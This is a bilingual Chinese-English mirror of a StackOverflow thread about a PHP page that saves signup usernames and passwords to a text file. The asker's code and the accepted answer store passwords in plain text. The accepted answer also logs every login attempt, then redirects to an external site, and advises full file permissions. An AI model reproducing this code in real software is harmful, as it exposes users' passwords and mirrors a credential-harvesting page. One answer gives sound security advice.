创建一个登录并将用户输入存储在使用 php 的文本文件中
声明:本页面是StackOverFlow热门问题的中英对照翻译,遵循CC BY-SA 4.0协议,如果您需要使用它,必须同样遵循CC BY-SA许可,注明原文地址和作者信息,同时你必须将它归于原作者(不是我):StackOverFlow
原文地址: http://stackoverflow.com/questions/28376291/
Warning: these are provided under cc-by-sa 4.0 license. You are free to use/share it, But you must attribute it to the original authors (not me):
StackOverFlow
Create a login and that stores the users imput in a text file using php
提问by Ed K
I want to create a create account page for my simple login site where the user clicks a create account button and they are brought to a page with the following form to enter a login name and a password.
我想为我的简单登录站点创建一个创建帐户页面,用户在其中单击创建帐户按钮,然后他们将被带到具有以下表单的页面以输入登录名和密码。
<form action = "createaccount.php" method="get">
<h1> Please enter your information to create a new login account</h1>
<p>
<label>Login Name:</label><input type = "text" name = "name" />
<label>Password:</label><input type = "password" name = "pwd" />
<br/><br/>
</p>
<input type = "submit" id = "submit" value = "submit"/>
<input type = "reset" id = "reset" value = "reset"/>
</form>
After the user enters there data into the input boxes I want to run a php script to store this data into a text file called accounts.php (I know it is not secure but this data has no value to me as i am making it up as part of the learning process).
在用户将数据输入到输入框中后,我想运行一个 php 脚本将这些数据存储到一个名为 accounts.php 的文本文件中(我知道它不安全,但这些数据对我没有价值,因为我正在编造它作为学习过程的一部分)。
So far I have the following php code to store the data in the file createaccount.php
到目前为止,我有以下 php 代码来将数据存储在文件 createaccount.php 中
<?php
$username = $_GET['name'];
$password = $_GET['pwd'];
$filename = 'accounts.txt';
$fp = fopen($filename, 'a+');
fwrite ($fp, $username . "," . $password . "\n");
$fclose ($fp);
echo ("account created");
header("Location: "login.html");
die();
?>
This code I believe should take the inputs from login name and password and store them in a file called accounts.txt in the following format
我相信这段代码应该从登录名和密码中获取输入,并将它们存储在一个名为 accounts.txt 的文件中,格式如下
username1:password1
username2:password2
etc.
then echo the screen account created and then take the user to my login.html page so they can log in with there new account info.
然后回显创建的屏幕帐户,然后将用户带到我的 login.html 页面,以便他们可以使用新帐户信息登录。
But I try and run the code and it does not save my data to the file at all and when i submit the form it does not direct me back to the my login screen i just get a message saying page cannot be displayed.
但是我尝试运行代码,它根本没有将我的数据保存到文件中,当我提交表单时,它没有将我引导回登录屏幕,我只是收到一条消息,说无法显示页面。
采纳答案by Genetics
How to create a simple Login form.
如何创建一个简单的登录表单。
html (login.html)
html(登录.html)
<form action="login.php" method="post">
<input type="text" id="username" name="username"/>
<input type="password" id="password" name="password"/>
<input type="submit" name="Login" value="Login">
</form>
php (login.php)
php(登录.php)
<html>
<head>
<title>Login</title>
</head>
<body>
<?php
//If Submit Button Is Clicked Do the Following
if ($_POST['Login']){
$myFile = "log.txt";
$fh = fopen($myFile, 'a') or die("can't open file");
$stringData = $_POST['username'] . ":";
fwrite($fh, $stringData);
$stringData = $_POST['password'] . "\n";
fwrite($fh, $stringData);
fclose($fh);
} ?>
//goes here after
<script>location.href='https://YOURWEBSITE.com';</script>
</body>
</html>Hopefully that helps, any other questions add me on skype. Skype: YouRGenetics Website: ItzGenetics.com
希望这会有所帮助,任何其他问题都可以在 Skype 上添加我。Skype:YouRGenetics 网站:ItzGenetics.com
~NOTEIf your using a hosting company (GoDaddy,ect) that uses permissions make sure you give all permissions to the php file and the txt file.
~注意如果您使用使用权限的托管公司(GoDaddy 等),请确保您授予 php 文件和 txt 文件的所有权限。
回答by Funk Forty Niner
There are a few things wrong with your code
您的代码有一些问题
$fcloseremove the $sign. Otherwise error reporting will throw:
$fclose移除$标志。否则错误报告将抛出:
Fatal error: Function name must be a string in...
致命错误:函数名必须是...
Then, you have an extra quote in
然后,你有一个额外的报价
header("Location: "login.html");
^ right there
which should read as:
应为:
header("Location: login.html");
However, you're doing an echo. You can't echo andhave a header. You're outputting before header.
但是,您正在做回声。你不能回声并有一个标题。你在标题之前输出。
Use echo orheader.
使用回声或标题。
<?php
$username = $_GET['name'];
$password = $_GET['pwd'];
$filename = 'accounts.txt';
$fp = fopen($filename, 'a+');
fwrite ($fp, $username . "," . $password . "\n");
fclose ($fp);
// echo OR header, not both
// echo ("account created");
header("Location: login.html");
die();
?>
Sidenote:You're storing information with GET. At the very least, use POST. You're transmitting this LIVE over the Web and the information will be shown in your Web browser's address bar. Should it ever go LIVE; be careful.
旁注:您使用 GET 存储信息。至少,使用 POST。您正在通过 Web 传输此 LIVE,该信息将显示在您的 Web 浏览器的地址栏中。它应该上线吗?当心。
As you said, it's not secure. Use .htaccessto protect this file.
正如你所说,它不安全。使用.htaccess以保护该文件。
Example code in .htaccess
示例代码在 .htaccess
<Files data.txt>
order allow,deny
deny from all
</Files>
You should also look into the following for password storage:
您还应该查看以下密码存储:
CRYPT_BLOWFISHor PHP 5.5's password_hash()function.
CRYPT_BLOWFISH或 PHP 5.5 的password_hash()函数。
For PHP < 5.5 use the password_hash() compatibility pack.
对于 PHP < 5.5,请使用password_hash() compatibility pack.
Add error reportingto the top of your file(s) which will help find errors.
将错误报告添加到文件顶部,这将有助于查找错误。
<?php
error_reporting(E_ALL);
ini_set('display_errors', 1);
// rest of your code
Sidenote:Error reporting should only be done in staging, and never production.
旁注:错误报告应该只在登台时进行,而不要在生产中进行。
This code I believe should take the inputs from login name and password and store them in a file called accounts.txt in the following format
我相信这段代码应该从登录名和密码中获取输入,并将它们存储在一个名为 accounts.txt 的文件中,格式如下
username1:password1
username2:password2
etc.
If you want to save it with a colon as a seperator, then change
如果你想用冒号作为分隔符保存它,然后改变
fwrite ($fp, $username . "," . $password . "\n");
^
to
到
fwrite ($fp, $username . ":" . $password . "\n");
^
Using text files is a lot of work and demands more resources when working with these, especially when it comes to editing, deleting etc..
使用文本文件需要大量工作,并且在处理这些文件时需要更多资源,尤其是在编辑、删除等方面。
The use of a database is by far less maintenance and more secure when using prepared statements.
使用准备好的语句时,使用数据库的维护要少得多,而且更安全。
回答by taliezin
I think first you have to check the return value of fopen:
我认为首先你必须检查 fopen 的返回值:
$fp = fopen($filename, 'a+');
if (FALSE === $fp) {
echo 'Can not open file...';
}
And the same for fwrite...
和 fwrite 一样......
